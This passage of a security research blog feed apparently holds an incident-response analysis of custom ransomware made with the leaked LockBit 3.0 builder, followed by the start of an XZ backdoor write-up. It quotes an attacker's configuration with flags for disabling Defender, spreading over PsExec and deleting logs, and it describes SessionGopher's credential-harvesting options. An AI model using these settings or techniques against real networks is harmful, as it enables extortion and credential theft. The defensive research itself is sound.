  1835. <p>Besides this, the builder allows the attacker to choose which files, in which directories, and in which systems they do not want to encrypt. If the attacker knows their way around the target infrastructure, they can generate malware tailored to the specific configuration of the target&#8217;s network architecture, such as important files, administrative accounts, and critical systems. The images below show the process of generating customized ransomware according to the above configuration, and the resulting files. As we can see, <strong>LB3.exe</strong> is the main file. This is the artifact that will be delivered to the victim. The builder also generates <strong>LB3Decryptor.exe</strong> for recovering the files, as well as several different variants of the main file. For example, <strong>LB3_pass.exe</strong> is a password-protected version of the ransomware, while the reflective DLL can be used to bypass the standard operating system loader and inject malware directly into memory. The TXT files contain instructions on how to execute the password-protected files.</p>
  1836. <div id="attachment_112390" style="width: 640px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112390" class="size-full wp-image-112390" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03.png" alt="Creation of a customized LockBit version" width="630" height="148" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03.png 630w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103600/LockBit_case_03-300x70.png 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112390" class="wp-caption-text">Creation of a customized LockBit version</p></div>
  1837. <div id="attachment_112391" style="width: 627px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112391" class="size-full wp-image-112391" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04.png" alt="Generated LockBit files" width="617" height="303" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04.png 617w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04-300x147.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103622/LockBit_case_04-570x280.png 570w" sizes="(max-width: 617px) 100vw, 617px" /></a><p id="caption-attachment-112391" class="wp-caption-text">Generated LockBit files</p></div>
  1838. <p>When we executed this custom build on a virtual machine, it performed its malicious activities and generated custom ransom note files. In real-life scenarios, the note will include details on how the victim should contact the attackers to obtain a decryptor. It is worth noting that negotiating with the attackers and paying ransom should not be an option. Besides the ethical issues involved, there is doubt whether a tool for recovering the files will ever be provided.</p>
  1839. <div id="attachment_112392" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112392" class="size-large wp-image-112392" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-1024x695.png" alt="Custom ransom note" width="1024" height="695" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-1024x695.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-300x204.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-768x521.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-516x350.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-740x502.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-413x280.png 413w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05-800x543.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103650/LockBit_case_05.png 1135w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112392" class="wp-caption-text">Custom ransom note</p></div>
  1840. <p>However, as we generated the ransomware sample and a corresponding decryptor ourselves in a controlled lab environment, we were able to test if the latter actually worked. We tried to decrypt our encrypted files and found out that if the decryptor for the sample was available, it was indeed able to recover the files, as shown in the image below.</p>
  1841. <div id="attachment_112393" style="width: 640px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112393" class="size-full wp-image-112393" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06.png" alt="LB3Decryptor execution" width="630" height="229" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06.png 630w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103722/LockBit_case_06-300x109.png 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112393" class="wp-caption-text">LB3Decryptor execution</p></div>
  1842. <p>That said, we must once again underscore that even a correctly working decryptor is no guarantee that the attackers will play fair.</p>
  1843. <h2 id="the-recent-lockbit-takedown-and-custom-lockbit-builds">The recent LockBit takedown and custom LockBit builds</h2>
  1844. <p>In February 2024, the international law enforcement task force <a href="https://www.weforum.org/agenda/2024/02/lockbit-ransomware-operation-cronos-cybercrime/" target="_blank" rel="noopener">Operation Cronos</a> gained visibility into LockBit&#8217;s operations after taking the group down. The collaborative action involved law enforcement agencies from 10 countries, which seized the infrastructure and took control of the LockBit administration environment. However, a few days after the operation, the ransomware group <a href="https://www.scmagazine.com/news/lockbit-returns-after-takedown-with-new-extortion-threats" target="_blank" rel="noopener">announced</a> that they were back in action.</p>
  1845. <p>The takedown operation allowed LEAs to seize the group&#8217;s infrastructure, obtain private decryption keys and prepare a <a href="https://www.nomoreransom.org/es/decryption-tools.html#Lockbit30" target="_blank" rel="noopener">decryption toolset</a> based on a known-victim ID list obtained by the authorities. The <strong>check_decryption_id</strong> utility checks if the ransom ID enabled for the victim is on the list of known decryption keys:</p>
  1846. <div id="attachment_112394" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112394" class="size-large wp-image-112394" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-1024x179.png" alt="check_decryption_id.exe execution" width="1024" height="179" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-1024x179.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-300x52.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-768x134.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-740x129.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07-800x140.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12103815/LockBit_case_07.png 1468w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112394" class="wp-caption-text">check_decryption_id.exe execution</p></div>
  1847. <p>The <strong>check_decrypt</strong> tool assesses decryptability: while there is a possibility that the files will be recovered, the outcome of the process depends on multiple conditions, and this tool just checks which of these conditions are met in the systems being analyzed. A CSV file is created, listing files that can be decrypted and providing an email address to reach out to for further instructions on restoring the files:</p>
  1848. <div id="attachment_112395" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112395" class="size-large wp-image-112395" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-1024x411.png" alt="check_decrypt.exe execution" width="1024" height="411" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-1024x411.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-300x120.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-768x308.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-872x350.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-740x297.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-697x280.png 697w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08-800x321.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104037/LockBit_case_08.png 1153w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112395" class="wp-caption-text">check_decrypt.exe execution</p></div>
  1849. <p>This toolset caught our attention because we had investigated several cases relating to the LockBit threat. We normally recommend that our customers save their encrypted critical files and wait for an opportunity to decrypt them with the help of threat researches or artifacts seized by the authorities, which is merely a matter of time. We ran victim IDs and encrypted files analyzed by our team through the decryption tool, but most of them showed the same result:</p>
  1850. <div id="attachment_112396" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112396" class="size-large wp-image-112396" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-1024x162.png" alt="Testing the tool on a victim ID obtained by our team" width="1024" height="162" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-1024x162.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-768x121.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-740x117.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09-800x126.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104116/LockBit_case_09.png 1456w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112396" class="wp-caption-text">Testing the tool on a victim ID obtained by our team</p></div>
  1851. <p>The <strong>check_decrypt</strong> also confirmed that it was not possible to decrypt the files by using the database of known keys:</p>
  1852. <div id="attachment_112397" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112397" class="size-large wp-image-112397" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-1024x499.png" alt="Testing the check_decrypt.exe tool on encrypted files" width="1024" height="499" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-1024x499.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-300x146.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-768x375.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-718x350.png 718w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-740x361.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-574x280.png 574w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10-800x390.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104150/LockBit_case_10.png 1466w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112397" class="wp-caption-text">Testing the check_decrypt.exe tool on encrypted files</p></div>
  1853. <p>Our analysis and previous research confirmed that files encrypted with a payload generated with the help of the leaked LockBit builder could not be decrypted with existing decryption tools, essentially because the independent groups behind these attacks did not share their private keys with the RaaS operator.</p>
  1854. <h2 id="geography-of-the-leaked-lockbit-builder-based-attacks">Geography of the leaked LockBit builder-based attacks</h2>
  1855. <p>Custom LockBit builds created with the leaked builder were involved in a number of incidents all over the world. These attacks were most likely unrelated and executed by independent actors. The leaked builder apparently has been used by LockBit ransomware competitors to target companies in the Commonwealth of Independent States, violating the group&#8217;s number one rule to avoid compromising CIS nationals. This <a href="https://flare.io/learn/resources/dark-web-drama-lockbit-and-the-an-security-breach-saga/" target="_blank" rel="noopener">triggered a discussion</a> on the dark web, where LockBit operators tried to explain that they had nothing to do with these attacks.</p>
  1856. <p>In our incident response practice, we have come across ransomware samples created with the help of the leaked builder in incidents in Russia, Italy, Guinea-Bissau, and Chile. Although the builder provides a number of customization options, as we have shown above, most of the attacks used the default or slightly modified configuration. However, one incident stood out.</p>
  1857. <h2 id="a-real-life-incident-response-case-involving-a-custom-lockbit-build">A real-life incident response case involving a custom LockBit build</h2>
  1858. <p>In a recent incident response engagement, we faced a ransomware scenario involving a LockBit sample built with the leaked builder and featuring impersonation and network spread capabilities we had not seen before. The attacker was able to exploit an internet-facing server that exposed multiple sensitive ports. Somehow, they were able to obtain the administrator password – we believe that it may have been stored in plain text inside a file, or that the attacker may have used social engineering. Then, the adversary generated custom ransomware using the privileged account they had access to. Our team was able to obtain the relevant fields present in the <strong>config.json</strong> file that the attacker used:</p><pre class="crayon-plain-tag">"impersonation": true,
  1859. "impers_accounts": "Administrator:************",
  1860. "local_disks": true,
  1861. "network_shares": true,
  1862. "running_one": false,
  1863. "kill_defender": true,
  1864. "psexec_netspread": true,
  1865. "delete_eventlogs": true,</pre><p>
  1866. As we can see, the custom version has the ability to impersonate the administrator account, affect network shares, and spread easily across the network via PsExec.</p>
  1867. <p>Moreover, it is configured to run more than once on each host. One of the first steps that the executable does when started is check for, and create, a unique mutex based on a hash sum of the ransomware public key in the format: <strong>&#8220;Global\%.8x%.8x%.8x%.8x%.8x&#8221;</strong>. If the <strong>running_one</strong> flag is set to true in the configuration and the mutex is already present in the operating system, the process will exit.</p>
  1868. <p>In our case, the configuration allowed concurrent executions of several ransomware instances on the same host. This behavior, combined with the use of configuration flags for automatic network propagation with high-privileged domain credentials, led to an uncontrolled avalanche effect: each host that got infected then started trying to infect other hosts on the network, including those already infected. From an incident response point of view, this means finding evidence, if available, of different origins for the same threat. See below the evidence found on one host of remote service creation by PsExec with authentication completed from multiple infected hosts.</p>
  1869. <div id="attachment_112398" style="width: 744px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112398" class="size-full wp-image-112398" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11.png" alt="Remote service creation by PsExec" width="734" height="766" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11.png 734w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11-287x300.png 287w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11-335x350.png 335w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104355/LockBit_case_11-268x280.png 268w" sizes="(max-width: 734px) 100vw, 734px" /></a><p id="caption-attachment-112398" class="wp-caption-text">Remote service creation by PsExec</p></div>
  1870. <p>Although this evidence was present in the infected systems, most of the logs had been deleted by the ransomware immediately after the initial infection. Because of that, it was not possible to determine how the attacker was able to gain access to the server and to the administrator password. The remote service creation logs remained because when the malware was performing lateral movement on the network, it generated new logs, which it did not delete, and which were helpful in detecting its spread across the infrastructure.</p>
  1871. <div id="attachment_112399" style="width: 877px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112399" class="size-full wp-image-112399" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12.png" alt="Event logs cleared" width="867" height="302" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-768x268.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-740x258.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-804x280.png 804w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-800x279.png 800w" sizes="(max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-112399" class="wp-caption-text">Event logs cleared</p></div>
  1872. <p>By analyzing some of the traces that were not erased on the initial affected server, we identified compressed Gzip data in a memory stream. The data was encoded in Base64. After decoding and decompression, we found evidence of the use of Cobalt Strike. We were able to identify the C2 server used by the attacker to communicate with the affected machine and promptly sent this indicator to the customer for blacklisting.</p>
  1873. <p>We also spotted the use of the <a href="https://github.com/Arvanaghi/SessionGopher" target="_blank" rel="noopener">SessionGopher</a> script. This tool uses WMI to extract saved session information for remote desktop access tools, such as WinSCP, PuTTY, FileZilla, and Microsoft Remote Desktop. This is accomplished by querying <strong>HKEY_USERS</strong> for PuTTY, WinSCP, and Remote Desktop saved sessions. In <strong>Thorough</strong> mode, the script can identify <strong>.ppk</strong>, <strong>.rdp</strong>, and <strong>.sdtid</strong> files in order to extract private keys and session information. It can be run remotely by using the <strong>-iL</strong> option followed by the list of computers. The <strong>-AllDomain</strong> flag allows running it against all AD-joined computers. As shown in the image below, the script can easily extract saved passwords for remote connections. The results can be exported to a CSV file for later use.</p>
  1874. <div id="attachment_112400" style="width: 604px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112400" class="size-full wp-image-112400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13.png" alt="Password extraction using SessionGopher" width="594" height="688" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13.png 594w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13-259x300.png 259w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13-302x350.png 302w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13-242x280.png 242w" sizes="(max-width: 594px) 100vw, 594px" /></a><p id="caption-attachment-112400" class="wp-caption-text">Password extraction using SessionGopher</p></div>
  1875. <p>Although SessionGopher is designed for collecting stored credentials, it was not the tool used by the attackers for initial credential dumping. Instead, they employed SessionGopher to collect additional credentials and services in the infrastructure at a later stage.</p>
  1876. <p>Once we identified the C2 domains and some other IP addresses related to the attacker and extracted details about the impersonated accounts and tools implemented for automatic deployment, the customer changed all affected users&#8217; credentials and configured security controls to avoid PsExec execution, thus stopping the infection. Monitoring network and user account activities allowed us to identify the infected systems and isolate them for analysis and recovery.</p>
  1877. <p>This case shows an interesting combination of techniques used to gain and maintain access to the target network, as well as encrypt important data and impair defenses. Below are the TTPs identified for this scenario.</p>
  1878. <table width="100%">
  1879. <tbody>
  1880. <tr>
  1881. <td width="35%"><strong>Tactic</strong></td>
  1882. <td width="40%"><strong>Technique</strong></td>
  1883. <td width="25%"><strong>ID</strong></td>
  1884. </tr>
  1885. <tr>
  1886. <td>Impact</td>
  1887. <td>Data Encrypted for Impact</td>
  1888. <td><a href="https://attack.mitre.org/techniques/T1486/" target="_blank" rel="noopener">T1486</a></td>
  1889. </tr>
  1890. <tr>
  1891. <td>Defense Evasion, Persistence, Privilege Escalation, Initial Access</td>
  1892. <td>Valid Accounts</td>
  1893. <td><a href="https://attack.mitre.org/techniques/T1078/002/" target="_blank" rel="noopener">T1078.002</a></td>
  1894. </tr>
  1895. <tr>
  1896. <td>Credential Access</td>
  1897. <td>Credentials from Password Stores</td>
  1898. <td><a href="https://attack.mitre.org/techniques/T1555/" target="_blank" rel="noopener">T1555</a></td>
  1899. </tr>
  1900. <tr>
  1901. <td>Lateral Movement</td>
  1902. <td>Remote Services</td>
  1903. <td><a href="https://attack.mitre.org/techniques/T0886/" target="_blank" rel="noopener">T0886</a></td>
  1904. </tr>
  1905. <tr>
  1906. <td>Discovery</td>
  1907. <td>Network Service Discovery</td>
  1908. <td><a href="https://attack.mitre.org/techniques/T1046/" target="_blank" rel="noopener">T1046</a></td>
  1909. </tr>
  1910. <tr>
  1911. <td>Defense evasion</td>
  1912. <td>Clear Windows Event Logs</td>
  1913. <td><a href="https://attack.mitre.org/techniques/T1070/001/" target="_blank" rel="noopener">T1070.001</a></td>
  1914. </tr>
  1915. <tr>
  1916. <td>Defense evasion</td>
  1917. <td>Impair Defenses</td>
  1918. <td><a href="https://attack.mitre.org/techniques/T1562/" target="_blank" rel="noopener">T1562</a></td>
  1919. </tr>
  1920. </tbody>
  1921. </table>
  1922. <h2 id="preventive-actions-against-ransomware-attacks">Preventive actions against ransomware attacks</h2>
  1923. <p>Ransomware attacks can be devastating, especially if the attackers manage to get hold of high-privileged credentials. Measures for mitigating the risk of such an attack may vary depending on the technology used by the company. However, there are certain infrastructure-agnostic techniques:</p>
  1924. <ul>
  1925. <li>Using a robust, properly-configured antimalware solution, such as <a href="https://www.kaspersky.com/small-to-medium-business-security/endpoint-windows" target="_blank" rel="noopener">Kaspersky Endpoint Security</a></li>
  1926. <li>Implementing <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats</li>
  1927. <li>Disabling unused services and ports to minimize the attack surface</li>
  1928. <li>Keeping all systems and software up to date</li>
  1929. <li>Conducting regular penetration tests and vulnerability scanning to identify vulnerabilities and promptly apply appropriate countermeasures</li>
  1930. <li>Adopting regular cybersecurity training, so that employees are aware of cyberthreats and ways to avoid them</li>
  1931. <li>Making backups frequently and testing them</li>
  1932. </ul>
  1933. <h2 id="conclusion">Conclusion</h2>
  1934. <p>Our examination of the LockBit 3.0 builder files shows the alarming simplicity with which attackers can craft customized ransomware, as evidenced by a recent incident where adversaries exploited administrator credentials to deploy a tailored ransomware variant. This underscores the need for robust security measures capable of mitigating this kind of threat effectively, as well as adoption of a cybersecurity culture among employees.</p>
  1935. <p>Kaspersky products detect the threat with the following verdicts:</p>
  1936. <ul>
  1937. <li>Trojan-Ransom.Win32.Lockbit.gen</li>
  1938. <li>Trojan.Multi.Crypmod.gen</li>
  1939. <li>Trojan-Ransom.Win32.Generic</li>
  1940. </ul>
  1941. <p>And the SessionGopher script, as:</p>
  1942. <ul>
  1943. <li>HackTool.PowerShell.Agent.l</li>
  1944. <li>HackTool.PowerShell.Agent.ad</li>
  1945. </ul>
  1946. ]]></content:encoded>
  1948. <wfw:commentRss>https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/feed/</wfw:commentRss>
  1949. <slash:comments>0</slash:comments>
  1952. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1.jpg" width="1200" height="646"><media:keywords>full</media:keywords></media:content>
  1953. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-1024x551.jpg" width="1024" height="551"><media:keywords>large</media:keywords></media:content>
  1954. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-300x162.jpg" width="300" height="162"><media:keywords>medium</media:keywords></media:content>
  1955. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1956. </item>
  1957. <item>
  1958. <title>XZ backdoor story &#8211; Initial analysis</title>
  1959. <link>https://securelist.com/xz-backdoor-story-part-1/112354/</link>
  1960. <comments>https://securelist.com/xz-backdoor-story-part-1/112354/#comments</comments>
  1962. <dc:creator><![CDATA[GReAT]]></dc:creator>
  1963. <pubDate>Fri, 12 Apr 2024 08:00:34 +0000</pubDate>
  1964. <category><![CDATA[Incidents]]></category>
  1965. <category><![CDATA[Backdoor]]></category>
  1966. <category><![CDATA[Cyber espionage]]></category>
  1967. <category><![CDATA[Linux]]></category>
  1968. <category><![CDATA[Malware]]></category>
  1969. <category><![CDATA[Malware Descriptions]]></category>
  1970. <category><![CDATA[Malware Technologies]]></category>
  1971. <category><![CDATA[SSH]]></category>
  1972. <category><![CDATA[XZ]]></category>
  1973. <category><![CDATA[Unix and macOS malware]]></category>
  1974. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112354</guid>
  1975.  
  1976. <description><![CDATA[Kaspersky analysis of the backdoor recently found in XZ, which is used in many popular Linux distributions and in OpenSSH server process.]]></description>
  1977. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>On March 29, 2024, a single <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" target="_blank" rel="noopener">message</a> on the Openwall OSS-security mailing list marked an important discovery for the information security, open source and Linux communities: the discovery of a malicious backdoor in <strong>XZ</strong>. <strong>XZ </strong>is a compression utility integrated into many popular distributions of Linux.</p>
  1978. <p>The particular danger of the backdoored library lies in its use by the OpenSSH server process <strong>sshd</strong>. On several systemd-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use systemd features, and as a result has a dependency on this library (note that Arch Linux and Gentoo are unaffected). The ultimate goal of the attackers was most likely to introduce a remote code execution capability to <strong>sshd</strong> that no one else could use.</p>
  1979. <p>Unlike other supply chain attacks we have seen in Node.js, <a href="https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/" target="_blank" rel="noopener">PyPI</a>, <a href="https://social.librem.one/@eighthave/112194828562355097" target="_blank" rel="noopener">FDroid</a>, and the Linux <a href="https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh@linuxfoundation.org/" target="_blank" rel="noopener">Kernel</a> that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that almost succeeded in compromising SSH servers on a global scale.</p>
  1980. <p>The backdoor in the liblzma library was introduced at two levels. The source code of the build infrastructure that generated the final packages was slightly modified (by introducing an additional file <strong>build-to-host.m4</strong>) to extract the next stage script that was hidden in a test case file (<strong>bad-3-corrupt_lzma2.xz</strong>). These scripts in turn extracted a malicious binary component from another test case file (<strong>good-large_compressed.lzma</strong>) that was linked with the legitimate library during the compilation process to be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The compromise of XZ Utils is assigned <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3094" target="_blank" rel="noopener">CVE-2024–3094</a> with the maximum severity score of 10.</p>
  1981. <h2 id="the-timeline-of-events">The timeline of events</h2>
  1982. <p>2024.01.19 XZ website moved to GitHub pages by a new maintainer (<a href="https://github.com/JiaT75" target="_blank" rel="noopener">jiaT75</a>)<br />
  1983. 2024.02.15 &#8220;build-to-host.m4&#8221; is <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e" target="_blank" rel="noopener">added</a> to .gitignore<br />
  1984. 2024.02.23 two &#8220;test files&#8221; that contained the stages of the malicious script are <a href="https://git.tukaani.org/?p=xz.git;a=commit;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0" target="_blank" rel="noopener">introduced</a><br />
  1985. <u>2024.02.24 XZ 5.6.0 is released</u><br />
  1986. 2024.02.26 <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7" target="_blank" rel="noopener">commit</a> in CMakeLists.txt that sabotages the <a href="https://man7.org/linux/man-pages/man7/landlock.7.html" target="_blank" rel="noopener">Landlock</a> security feature<br />
  1987. 2024.03.04 the backdoor leads to <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2267598" target="_blank" rel="noopener">issues</a> with Valgrind<br />
  1988. 2024.03.09 two &#8220;test files&#8221; are updated, CRC functions are modified, Valgrind issue is &#8220;fixed&#8221;<br />
  1989. <u>2024.03.09 XZ 5.6.1 is released</u><br />
